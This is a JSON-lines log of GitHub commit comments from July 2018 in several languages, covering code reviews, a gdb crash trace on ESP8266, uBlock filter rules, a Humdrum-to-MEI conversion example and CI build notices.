{"id":"7988434000","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29762712,"position":null,"line":null,"path":null,"commit_id":"8c02827568dafd107a5708ad820381bc11b412e3","created_at":"2018-07-19T11:02:35Z","updated_at":"2018-07-19T11:02:35Z","author_association":"COLLABORATOR","body":"浅田\r\n入れ替え用の配列を作る処理が無駄です。\r\n処理が長くなる、メモリを浪費するという観点から無駄であり、この処理がなくとも今回の仕様に沿ったものは十分作成できます。"}},"created_at":"2018-07-19T11:02:35Z"}
{"id":"7988435749","type":"CommitCommentEvent","actor":{"login":"dixitDrc"},"repo":{"name":"dixitDrc/NYC"},"payload":{"comment":{"id":29762717,"position":null,"line":null,"path":null,"commit_id":"fbb1408208151cf7421a7a9438782d10846566a6","created_at":"2018-07-19T11:02:58Z","updated_at":"2018-07-19T11:02:58Z","author_association":"OWNER","body":"19/16:30"}},"created_at":"2018-07-19T11:02:58Z"}
{"id":"7988437020","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762719,"position":17,"line":17,"path":"pom.xml","commit_id":"ba29277e6ae92f3911b6d9ca842dbccb2feda88f","created_at":"2018-07-19T11:03:14Z","updated_at":"2018-07-19T11:03:14Z","author_association":"NONE","body":"Ага, рекомендую уже переходить на 1.8, потому что 1.7 поддерживается с некоторыми тонкосятми."}},"created_at":"2018-07-19T11:03:14Z"}
{"id":"7988437997","type":"CommitCommentEvent","actor":{"login":"ataweg"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29762721,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-19T11:03:26Z","updated_at":"2018-07-19T11:03:26Z","author_association":"NONE","body":"That's exactly what I'm watching.  If an unaligned value or 8/16 bit value is written or read to/from the iram, gdb reports a SIGSEGV. \r\n\r\n```\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x40247593 in single_key_init (gpio_id=gpio_id@entry=0x0, gpio_name=gpio_name@entry=0x60000834, gpio_func=gpio_func@entry=0x0,\r\n    very_long_press=very_long_press@entry=0x402465d4 <buttonVeryLongPress>, press_very_long_time=press_very_long_time@entry=0x2710,\r\n    long_press=long_press@entry=0x4024659c <buttonLongPress>, press_long_time=press_long_time@entry=0x7d0,\r\n    short_press=short_press@entry=0x4024661c <buttonShortPress>) at modules/keys.c:96\r\n96         single_key->key_state   = KEY_IDLE;\r\n(gdb) disass single_key_init\r\nDump of assembler code for function single_key_init:\r\n   0x40247540 <+0>:     addi    a1, a1, -48\r\n   0x40247543 <+3>:     s32i    a0, a1, 44\r\n   0x40247546 <+6>:     s32i    a12, a1, 40\r\n   0x40247549 <+9>:     s32i.n  a13, a1, 36\r\n   0x4024754b <+11>:    s32i.n  a14, a1, 32\r\n   0x4024754d <+13>:    s32i.n  a15, a1, 28\r\n   0x4024754f <+15>:    mov.n   a13, a3\r\n   0x40247551 <+17>:    s32i.n  a5, a1, 0\r\n   0x40247553 <+19>:    s32i.n  a6, a1, 4\r\n   0x40247555 <+21>:    s32i.n  a7, a1, 8\r\n   0x40247557 <+23>:    extui   a15, a2, 0, 8\r\n   0x4024755a <+26>:    extui   a14, a4, 0, 8\r\n   0x4024755d <+29>:    l32r    a0, 0x4023834c\r\n   0x40247560 <+32>:    callx0  a0\r\n   0x40247563 <+35>:    movi    a3, 0x3e8\r\n   0x40247566 <+38>:    l32r    a0, 0x40213710\r\n   0x40247569 <+41>:    callx0  a0\r\n   0x4024756c <+44>:    call0   0x40242a44 <sys_time2str>\r\n   0x4024756f <+47>:    movi.n  a5, 92\r\n   0x40247571 <+49>:    l32r    a4, 0x40247378\r\n   0x40247574 <+52>:    or      a3, a2, a2\r\n   0x40247577 <+55>:    l32r    a2, 0x40247530\r\n   0x4024757a <+58>:    l32r    a0, 0x402132c4\r\n   0x4024757d <+61>:    callx0  a0\r\n   0x40247580 <+64>:    movi.n  a5, 1\r\n   0x40247582 <+66>:    movi.n  a4, 94\r\n   0x40247584 <+68>:    l32r    a3, 0x40247534\r\n   0x40247587 <+71>:    movi.n  a2, 52\r\n   0x40247589 <+73>:    l32r    a0, 0x4024753c\r\n   0x4024758c <+76>:    callx0  a0\r\n   0x4024758f <+79>:    mov.n   a12, a2\r\n   0x40247591 <+81>:    movi.n  a2, 0\r\n=> 0x40247593 <+83>:    s8i     a2, a12, 0\r\n   0x40247596 <+86>:    s8i     a2, a12, 1\r\n   0x40247599 <+89>:    s8i     a15, a12, 2\r\n   0x4024759c <+92>:    s8i     a14, a12, 3\r\n   0x4024759f <+95>:    s32i.n  a13, a12, 4\r\n   0x402475a1 <+97>:    movi.n  a2, 0\r\n   0x402475a3 <+99>:    s32i.n  a2, a12, 8\r\n   0x402475a5 <+101>:   l32i.n  a2, a1, 52\r\n   0x402475a7 <+103>:   s32i.n  a2, a12, 12\r\n   0x402475a9 <+105>:   l32i.n  a2, a1, 8\r\n   0x402475ab <+107>:   s32i.n  a2, a12, 16\r\n   0x402475ad <+109>:   l32i.n  a2, a1, 48\r\n```"}},"created_at":"2018-07-19T11:03:26Z"}
{"id":"7988439182","type":"CommitCommentEvent","actor":{"login":"giteshnitw"},"repo":{"name":"giteshnitw/Hello_World"},"payload":{"comment":{"id":29762722,"position":null,"line":null,"path":null,"commit_id":"2cb4814beb0b1857e625e78185729bb422ba376e","created_at":"2018-07-19T11:03:41Z","updated_at":"2018-07-19T11:03:41Z","author_association":"OWNER","body":"Merged first time."}},"created_at":"2018-07-19T11:03:41Z"}
{"id":"7988439288","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762723,"position":1,"line":1,"path":"spring01-hw.iml","commit_id":"ba29277e6ae92f3911b6d9ca842dbccb2feda88f","created_at":"2018-07-19T11:03:43Z","updated_at":"2018-07-19T11:03:43Z","author_association":"NONE","body":"Вот этого файла не должно быть в репозитории. `*.iml` нужно добавить в `.gitgnore`"}},"created_at":"2018-07-19T11:03:43Z"}
{"id":"7988443183","type":"CommitCommentEvent","actor":{"login":"StephanOsthold"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29762730,"position":12,"line":38,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin/Assets/templates/WorkflowAppTemplateForEditTemplate.txt","commit_id":"71752d4251fda87a4a1f65033546a5b257f19347","created_at":"2018-07-19T11:04:35Z","updated_at":"2018-07-19T11:04:35Z","author_association":"CONTRIBUTOR","body":"Der String ist später dazugekommen. Reiche ich nach."}},"created_at":"2018-07-19T11:04:35Z"}
{"id":"7988444582","type":"CommitCommentEvent","actor":{"login":"RoberthBSantos"},"repo":{"name":"vikvik98/ProjetoEventos"},"payload":{"comment":{"id":29762733,"position":null,"line":null,"path":null,"commit_id":"24f83d2497586c9681b8dddeb5ef8d7e3835bad8","created_at":"2018-07-19T11:04:54Z","updated_at":"2018-07-19T11:04:54Z","author_association":"COLLABORATOR","body":"Aceitem ai "}},"created_at":"2018-07-19T11:04:54Z"}
{"id":"7988446256","type":"CommitCommentEvent","actor":{"login":"stobis"},"repo":{"name":"react-community/react-native-maps"},"payload":{"comment":{"id":29762741,"position":12,"line":20,"path":"lib/android/src/main/java/com/airbnb/android/react/maps/AirMapView.java","commit_id":"2d760e19b111ba2721ca8f6dfde9e4339939ff1f","created_at":"2018-07-19T11:05:15Z","updated_at":"2018-07-19T11:05:15Z","author_association":"NONE","body":"Why removed?"}},"created_at":"2018-07-19T11:05:15Z"}
{"id":"7988448084","type":"CommitCommentEvent","actor":{"login":"scttmcvy"},"repo":{"name":"scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434"},"payload":{"comment":{"id":29762748,"position":null,"line":null,"path":null,"commit_id":"0ad9c2b29e3e33498215238ae6ea771224c0ce63","created_at":"2018-07-19T11:05:41Z","updated_at":"2018-07-19T11:05:41Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/7b7fd12f-c3a6-4928-b531-f17b18d632e4?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180703123746434\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/79ab610f-61d7-4153-bcbf-d27d4568e6ff?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180703123746434\") deployed [sample-cloud-native-toolchain-tutorial-20180703123746434](https://github.com/scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434/releases/tag/deploy-ibm-yp-eu-gb-scott.mcavoy-test-20180719-110540 \"deploy-ibm-yp-eu-gb-scott.mcavoy-test-20180719-110540\") to [test](https://console.bluemix.net/apps/96ad3d4a-a8e7-46b8-8fbe-b54e6373893c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:scott.mcavoy:test\"), including this commit"}},"created_at":"2018-07-19T11:05:41Z"}
{"id":"7988448397","type":"CommitCommentEvent","actor":{"login":"adriweb"},"repo":{"name":"adriweb/emgiac"},"payload":{"comment":{"id":29762749,"position":112,"line":3522,"path":"giac/xcasfr.html","commit_id":"32a9222f32da7391d7d4710c8e01adaa60489cce","created_at":"2018-07-19T11:05:45Z","updated_at":"2018-07-19T11:05:45Z","author_association":"OWNER","body":"Ah mais non, il ne fallait pas remplacer mon rework des boutons :P\r\nBon, je ferai un commit tout a l'heure pour retablir cette partie la."}},"created_at":"2018-07-19T11:05:45Z"}
{"id":"7988448682","type":"CommitCommentEvent","actor":{"login":"stobis"},"repo":{"name":"react-community/react-native-maps"},"payload":{"comment":{"id":29762750,"position":172,"line":929,"path":"lib/android/src/main/java/com/airbnb/android/react/maps/AirMapView.java","commit_id":"2d760e19b111ba2721ca8f6dfde9e4339939ff1f","created_at":"2018-07-19T11:05:49Z","updated_at":"2018-07-19T11:05:49Z","author_association":"NONE","body":"Same as above, it's used in `AirMapManager.java`"}},"created_at":"2018-07-19T11:05:49Z"}
{"id":"7988454661","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762773,"position":13,"line":13,"path":"src/main/java/ru/otus/dao/QuestionDaoImpl.java","commit_id":"eab9a739dc41875cd59e3b37560c60c9565d18df","created_at":"2018-07-19T11:07:09Z","updated_at":"2018-07-19T11:07:09Z","author_association":"NONE","body":"Ну вот эту переменную можно сделать final, чтобы её случайно никто не перезаписал. "}},"created_at":"2018-07-19T11:07:09Z"}
{"id":"7988455145","type":"CommitCommentEvent","actor":{"login":"qwewqewr"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29762774,"position":null,"line":null,"path":null,"commit_id":"a942853d55dd0e96ff98e6c352e2c2a9e000ea86","created_at":"2018-07-19T11:07:14Z","updated_at":"2018-07-19T11:07:14Z","author_association":"NONE","body":"\r\n![untitled1](https://user-images.githubusercontent.com/32516043/42938998-6f644aa2-8b7e-11e8-98f3-57266e345dd8.png)\r\n\r\nIs it just me or something went wrong here ?"}},"created_at":"2018-07-19T11:07:14Z"}
{"id":"7988455692","type":"CommitCommentEvent","actor":{"login":"trvlrr"},"repo":{"name":"trvlrr/SimpleBP"},"payload":{"comment":{"id":29762775,"position":null,"line":null,"path":null,"commit_id":"b178d036adba4912de0fb7f7b6128892bc94b897","created_at":"2018-07-19T11:07:22Z","updated_at":"2018-07-19T11:07:22Z","author_association":"OWNER","body":"The HUD is also on by default now."}},"created_at":"2018-07-19T11:07:22Z"}
{"id":"7988457316","type":"CommitCommentEvent","actor":{"login":"h-huss"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29762780,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T11:07:43Z","updated_at":"2018-07-19T11:07:43Z","author_association":"CONTRIBUTOR","body":"What happens if a user accidentally enters his password as username?"}},"created_at":"2018-07-19T11:07:43Z"}
{"id":"7988457584","type":"CommitCommentEvent","actor":{"login":"lainverse"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29762781,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T11:07:47Z","updated_at":"2018-07-19T11:07:47Z","author_association":"NONE","body":"Wouldn't it work like this? (without domain=)\r\n```\r\n||piguiqproxy.com^$xmlhttprequest,redirect=nooptext\r\n||zmctrack.net^$xmlhttprequest,redirect=nooptext\r\n||amgload.net^$xmlhttprequest,redirect=nooptext\r\n/(^https?:\\/\\/([^.]+\\.)*rcdn\\.pro\\/).*/$xmlhttprequest,redirect=nooptext\r\n```"}},"created_at":"2018-07-19T11:07:47Z"}
{"id":"7988464240","type":"CommitCommentEvent","actor":{"login":"scttmcvy"},"repo":{"name":"scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434"},"payload":{"comment":{"id":29762792,"position":null,"line":null,"path":null,"commit_id":"0ad9c2b29e3e33498215238ae6ea771224c0ce63","created_at":"2018-07-19T11:09:13Z","updated_at":"2018-07-19T11:09:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/7b7fd12f-c3a6-4928-b531-f17b18d632e4?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180703123746434\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/79ab610f-61d7-4153-bcbf-d27d4568e6ff?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180703123746434\") deployed [sample-cloud-native-toolchain-tutorial-20180703123746434](https://github.com/scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434/releases/tag/deploy-ibm-yp-eu-gb-scott.mcavoy-prod-20180719-110912 \"deploy-ibm-yp-eu-gb-scott.mcavoy-prod-20180719-110912\") to [prod](https://console.bluemix.net/apps/22dbb3c9-82f4-45ad-9e2c-72e6829b47f8?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:scott.mcavoy:prod\"), including this commit"}},"created_at":"2018-07-19T11:09:13Z"}
{"id":"7988469636","type":"CommitCommentEvent","actor":{"login":"Panchajanya1999"},"repo":{"name":"SudeepDuhoon/KO"},"payload":{"comment":{"id":29762801,"position":null,"line":null,"path":null,"commit_id":"e440edc50a91c7075d8d2a6315947c504e6b657e","created_at":"2018-07-19T11:10:23Z","updated_at":"2018-07-19T11:10:23Z","author_association":"CONTRIBUTOR","body":"kanged"}},"created_at":"2018-07-19T11:10:23Z"}
{"id":"7988469994","type":"CommitCommentEvent","actor":{"login":"SabinDiwan"},"repo":{"name":"BaiJiazm/DS-Algorithm"},"payload":{"comment":{"id":29762802,"position":null,"line":null,"path":null,"commit_id":"d62ab7fea5b5c21b3e1ee0aea3812d1ac66ee38f","created_at":"2018-07-19T11:10:28Z","updated_at":"2018-07-19T11:10:28Z","author_association":"NONE","body":"Gotta work on it."}},"created_at":"2018-07-19T11:10:28Z"}
{"id":"7988480161","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762818,"position":31,"line":31,"path":"src/main/java/ru/otus/service/QuizServiceImpl.java","commit_id":"eab9a739dc41875cd59e3b37560c60c9565d18df","created_at":"2018-07-19T11:12:45Z","updated_at":"2018-07-19T11:12:45Z","author_association":"NONE","body":"Отличное примененеи конструкции do-while!"}},"created_at":"2018-07-19T11:12:45Z"}
{"id":"7988480431","type":"CommitCommentEvent","actor":{"login":"imagejan"},"repo":{"name":"scenerygraphics/scenery"},"payload":{"comment":{"id":29762820,"position":null,"line":null,"path":null,"commit_id":"c54732342328af111950a4882b9df6bb0b0d465b","created_at":"2018-07-19T11:12:48Z","updated_at":"2018-07-19T11:12:48Z","author_association":"NONE","body":"Couldn't this also be achieved with the code below?\r\n\r\n```\r\nvar p: Node? = this\r\nwhile(p !is Scene && p != null) {\r\n    p = p.parent\r\n}\r\nreturn p as? Scene\r\n```\r\n\r\n(basicalliy just leaving away `.parent` from the original code)"}},"created_at":"2018-07-19T11:12:48Z"}
{"id":"7988482368","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762822,"position":17,"line":17,"path":"src/main/resources/spring-context.xml","commit_id":"eab9a739dc41875cd59e3b37560c60c9565d18df","created_at":"2018-07-19T11:13:14Z","updated_at":"2018-07-19T11:13:14Z","author_association":"NONE","body":"Отлично!"}},"created_at":"2018-07-19T11:13:14Z"}
{"id":"7988482715","type":"CommitCommentEvent","actor":{"login":"Christoph-Meyer"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29762826,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T11:13:19Z","updated_at":"2018-07-19T11:13:19Z","author_association":"CONTRIBUTOR","body":"He will not be logged in, ofc. "}},"created_at":"2018-07-19T11:13:19Z"}
{"id":"7988483567","type":"CommitCommentEvent","actor":{"login":"Yong-Seok"},"repo":{"name":"MagicBean1/magicBean"},"payload":{"comment":{"id":29762829,"position":null,"line":null,"path":null,"commit_id":"c225c2324f0195427045b0a2b3671ced33fd28aa","created_at":"2018-07-19T11:13:30Z","updated_at":"2018-07-19T11:13:30Z","author_association":"CONTRIBUTOR","body":"기훈이형"}},"created_at":"2018-07-19T11:13:30Z"}
{"id":"7988488165","type":"CommitCommentEvent","actor":{"login":"guoguo12"},"repo":{"name":"guoguo12/billboard-charts"},"payload":{"comment":{"id":29762840,"position":26,"line":125,"path":"billboard.py","commit_id":"fcfc48593e478b011a9ef8c00804354827ebf00e","created_at":"2018-07-19T11:14:31Z","updated_at":"2018-07-19T11:14:31Z","author_association":"OWNER","body":"IIRC, this logic should already be implemented by the Billboard website. In any case, it shouldn't be hard-coded like this because different charts have different earliest dates. "}},"created_at":"2018-07-19T11:14:31Z"}
{"id":"7988489775","type":"CommitCommentEvent","actor":{"login":"StephanOsthold"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29762843,"position":44,"line":310,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin.pm","commit_id":"71752d4251fda87a4a1f65033546a5b257f19347","created_at":"2018-07-19T11:14:53Z","updated_at":"2018-07-19T11:14:53Z","author_association":"CONTRIBUTOR","body":"Ob `(my $x)` oder `my ($x)` ist an der Stelle tatsächlich austauschbar. In der ersten Variante können mehrere Variablen zugewiesen werden, auch wenn einige schon existieren:\r\n```\r\nmy $x =...\r\n($x, my $y) = (...)\r\n```\r\nWährend in der zweiten Variante beide Variablen deklariert würden:\r\n```\r\nmy ($x, $y) = (...)\r\n```\r\n\r\nDie Klammern sind wichtig, da auf der rechten Seite ein Array (bzw. eine Liste) steht. So wird der erste Eintrag des Arrays dem $container_title zugewiesen, ansonsten würde dort die größe des Arrays landen."}},"created_at":"2018-07-19T11:14:53Z"}
{"id":"7988492676","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29762866,"position":null,"line":null,"path":null,"commit_id":"960b590df9dab9eec3636d6b798206d2117a073a","created_at":"2018-07-19T11:15:30Z","updated_at":"2018-07-19T11:15:30Z","author_association":"CONTRIBUTOR","body":"This commit is related to issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/123\r\n\r\nThe code allows for global style changes for \"cresc.\" and \"decresc.\" dynamic indications in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n```\r\n**kern\t**dynam\r\n*clefF4\t*\r\n1c\t<\r\n=\t=\r\n1d\t.\r\n=\t=\r\n1e\t>\r\n=\t=\r\n1f\t.\r\n==\t==\r\n*-\t*-\r\n!!!RDF**dynam: < = \"get louder\", fontstyle=\"bold\"\r\n!!!RDF**dynam: > = \"get softer\" fontstyle=normal\r\n```\r\n\r\nRendering:\r\n\r\n<img width=\"836\" alt=\"screen shot 2018-07-19 at 1 05 55 pm\" src=\"https://user-images.githubusercontent.com/3487289/42939326-8b61aa02-8b55-11e8-81eb-07a61eaa203c.png\">\r\n\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-19T13:10:07\" version=\"2.0.0-dev-ed8f4f5\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"11\" token=\"!!!RDF**dynam: &lt; = &quot;get louder&quot;, fontstyle=&quot;bold&quot;\" xml:id=\"loc11\">\r\n                    <frameInfo>\r\n                        <startTime float=\"16\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**dynam</referenceKey>\r\n                        <referenceValue>&lt; = \"get louder\", fontstyle=\"bold\"</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n                <metaFrame n=\"12\" token=\"!!!RDF**dynam: &gt; = &quot;get softer&quot;, fontstyle=normal\" xml:id=\"loc12\">\r\n                    <frameInfo>\r\n                        <startTime float=\"16\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**dynam</referenceKey>\r\n                        <referenceValue>&gt; = \"get softer\", fontstyle=normal</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001225529255\">\r\n                <score xml:id=\"score-0000000954530408\">\r\n                    <scoreDef xml:id=\"scoredef-0000000444723545\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000893686059\">\r\n                            <staffDef xml:id=\"staffdef-0000001253516346\" clef.shape=\"F\" clef.line=\"4\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001523461100\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000001178228361\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L3F2\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000500878011\" fontstyle=\"normal\" fontweight=\"bold\">get louder</rend>\r\n                            </dir>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L4\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L6\">\r\n                            <staff xml:id=\"staff-L6F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L6F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"1\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L7F2\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000938018266\" fontstyle=\"normal\">get softer</rend>\r\n                            </dir>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L8\" right=\"end\">\r\n                            <staff xml:id=\"staff-L8F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L8F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F1\" dur=\"1\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-19T11:15:30Z"}
{"id":"7988493529","type":"CommitCommentEvent","actor":{"login":"mamtaharris"},"repo":{"name":"mamtaharris/deloittetraining"},"payload":{"comment":{"id":29762867,"position":null,"line":null,"path":null,"commit_id":"3b80cec234b1f2e4842e33baf81964532d24e58b","created_at":"2018-07-19T11:15:41Z","updated_at":"2018-07-19T11:15:41Z","author_association":"OWNER","body":"Employee table"}},"created_at":"2018-07-19T11:15:41Z"}
{"id":"7988493962","type":"CommitCommentEvent","actor":{"login":"kwalter94"},"repo":{"name":"BaobabHealthTrust/DDE3-Dashboard"},"payload":{"comment":{"id":29762869,"position":5,"line":5,"path":"spec/log/creating_log_spec.rb","commit_id":"3770c9ebd7b3c254aa84d1368fbfa80b445fc627","created_at":"2018-07-19T11:15:47Z","updated_at":"2018-07-19T11:15:47Z","author_association":"NONE","body":"Missed an assertion here."}},"created_at":"2018-07-19T11:15:47Z"}
{"id":"7988499617","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762878,"position":1,"line":1,"path":"target/classes/foo.properties","commit_id":"eab9a739dc41875cd59e3b37560c60c9565d18df","created_at":"2018-07-19T11:17:05Z","updated_at":"2018-07-19T11:17:05Z","author_association":"NONE","body":"Ага, папку target/ тоже лучше разместить в .gitignore"}},"created_at":"2018-07-19T11:17:05Z"}
{"id":"7988502081","type":"CommitCommentEvent","actor":{"login":"okias"},"repo":{"name":"iputils/iputils"},"payload":{"comment":{"id":29762884,"position":null,"line":null,"path":null,"commit_id":"e0baf20067a75f093d690bd51a6db3f5afabca77","created_at":"2018-07-19T11:17:38Z","updated_at":"2018-07-19T11:17:38Z","author_association":"MEMBER","body":"Thanks! :)"}},"created_at":"2018-07-19T11:17:38Z"}
{"id":"7988502227","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"TheWalkingDelirium/spring01-hw"},"payload":{"comment":{"id":29762885,"position":5,"line":15,"path":"src/main/java/ru/otus/App.java","commit_id":"ef8095cec9209bcc00a1b3db54d978a370637170","created_at":"2018-07-19T11:17:40Z","updated_at":"2018-07-19T11:17:40Z","author_association":"NONE","body":"Всё так, правильно"}},"created_at":"2018-07-19T11:17:40Z"}
{"id":"7988502618","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29762887,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-19T11:17:45Z","updated_at":"2018-07-19T11:17:45Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2304 of 2304 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-19T11:17:45Z"}
{"id":"7988502940","type":"CommitCommentEvent","actor":{"login":"saileshbro"},"repo":{"name":"saileshbro/scientific-calculator-qt"},"payload":{"comment":{"id":29762889,"position":null,"line":null,"path":null,"commit_id":"dce81d4740e6ed63a36dfbc5d19b38bc7f9da57b","created_at":"2018-07-19T11:17:49Z","updated_at":"2018-07-19T11:17:49Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-19T11:17:49Z"}
